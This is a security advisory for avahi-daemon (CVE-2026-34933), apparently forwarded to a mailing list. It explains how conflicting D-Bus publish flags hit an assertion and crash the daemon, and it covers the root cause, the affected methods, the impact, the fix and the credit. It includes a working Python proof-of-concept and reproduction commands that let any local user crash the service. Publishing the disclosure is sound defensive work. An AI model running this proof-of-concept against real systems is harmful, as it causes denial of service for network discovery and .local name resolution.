https://github.com/avahi/avahi/security/advisories/GHSA-w65r-6gxh-vhvc advises:
Reachable assertion in transport_flags_from_domain (CVE-2026-34933)
Moderate
evverx published GHSA-w65r-6gxh-vhvc Apr 1, 2026
Affected versions: <=v0.9-rc3
Patched versions: v0.9-rc4
Description
-----------
In all versions up to and including 0.8 and 0.9-rc3, any unprivileged local
user can crash avahi-daemon by sending a single D-Bus method call with
conflicting publish flags.
The AVAHI_PUBLISH_USE_MULTICAST (0x100) and AVAHI_PUBLISH_USE_WIDE_AREA (0x80)
flags are individually accepted by the AVAHI_FLAGS_VALID() validation macro at
entry.c:201-209 (for AddRecord) and entry.c:593-597 (for AddService), since
both are listed in the allowed flags bitmask. However, these flags are mutually
exclusive, and the function transport_flags_from_domain() at entry.c:57 enforces
this exclusivity with an assert():
static void transport_flags_from_domain(AvahiServer *s, AvahiPublishFlags
*flags, const char *domain) {
assert(flags);
assert(domain);
assert(!((*flags & AVAHI_PUBLISH_USE_MULTICAST) && (*flags &
AVAHI_PUBLISH_USE_WIDE_AREA)));
// ...
}
When both flags are set simultaneously (flags = 0x180), the assertion fails,
causing the daemon to abort with SIGABRT. The D-Bus system bus policy
(avahi-dbus.conf) allows any local user to call EntryGroupNew and AddService
without restrictions.
Root cause
----------
The flags validation (AVAHI_FLAGS_VALID) and the mutual exclusivity check
(assert in transport_flags_from_domain) are performed at different layers
with no coordination:
1. AVAHI_FLAGS_VALID(flags, mask) checks !(flags & ~mask) -- it verifies that
no unknown bits are set, but does not check for mutually exclusive
combinations.
2. transport_flags_from_domain() enforces mutual exclusivity via assert(),
which is a fatal operation in a production daemon.
Affected D-Bus methods
----------------------
The following D-Bus methods on org.freedesktop.Avahi.EntryGroup accept a flags
parameter that reaches the vulnerable function:
Method D-Bus handler Core function
AddService dbus-entry-group.c:166 server_add_service_strlst_nocopy()
-> transport_flags_from_domain()
AddServiceSubtype dbus-entry-group.c:213 server_add_service_strlst_nocopy()
-> transport_flags_from_domain()
AddAddress dbus-entry-group.c:280 avahi_server_add_address()
-> transport_flags_from_domain()
AddRecord dbus-entry-group.c:311 avahi_server_add()
-> server_add_internal()
-> transport_flags_from_domain()
UpdateServiceTxt dbus-entry-group.c:370
server_update_service_txt_strlst_nocopy()
-> transport_flags_from_domain()
Proof of Concept
----------------
#!/usr/bin/env python3
"""Any local unprivileged user can crash avahi-daemon with this script."""
import dbus
AVAHI_PUBLISH_USE_WIDE_AREA = 128 # 0x80
AVAHI_PUBLISH_USE_MULTICAST = 256 # 0x100
CONFLICTING_FLAGS = AVAHI_PUBLISH_USE_WIDE_AREA | AVAHI_PUBLISH_USE_MULTICAST
bus = dbus.SystemBus()
server = dbus.Interface(
bus.get_object('org.freedesktop.Avahi', '/'),
'org.freedesktop.Avahi.Server'
)
# Create an entry group
eg_path = server.EntryGroupNew()
eg = dbus.Interface(
bus.get_object('org.freedesktop.Avahi', eg_path),
'org.freedesktop.Avahi.EntryGroup'
)
# Trigger the crash: AddService with both MULTICAST and WIDE_AREA flags
eg.AddService(
dbus.Int32(-1), # interface (AVAHI_IF_UNSPEC)
dbus.Int32(-1), # protocol (AVAHI_PROTO_UNSPEC)
dbus.UInt32(CONFLICTING_FLAGS), # flags = 0x180 (CRASH)
dbus.String("PoC-Service"), # name
dbus.String("_http._tcp"), # type
dbus.String(""), # domain
dbus.String(""), # host
dbus.UInt16(8080), # port
dbus.Array([], signature='ay') # TXT records
)
Reproduction
------------
# On any Linux system with avahi-daemon running:
apt install python3-dbus # if not already installed
python3 poc.py
# Verify crash:
systemctl status avahi-daemon
# Expected: "avahi-daemon.service: Main process exited, code=exited,
status=134/n/a"
journalctl -u avahi-daemon -n 5
# Expected: "entry.c:57: transport_flags_from_domain: Assertion
# `!((*flags & AVAHI_PUBLISH_USE_MULTICAST) && (*flags &
AVAHI_PUBLISH_USE_WIDE_AREA))' failed."
Impact
------
* Any unprivileged local user can immediately crash the avahi-daemon process.
* All mDNS/DNS-SD services on the host become unavailable.
* Applications relying on nss-mdns for .local hostname resolution fail.
* Network service discovery (printers, Chromecast, AirPlay, etc.) stops.
* While systemd auto-restarts the daemon, repeated crashes cause a persistent
DoS.
Credit
------
Discovered by Guillaume MEUNIER - Head of VOC France - Orange Cyberdefense on
2026-03-10.
Fix
---
It was addressed in <https://github.com/avahi/avahi/pull/891>.
Severity: Moderate - 5.5 / 10
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CVE ID: CVE-2026-34933
Weakness: CWE-617
--
-Alan Coopersmith- [email protected]
Oracle Solaris Engineering - https://blogs.oracle.com/solaris
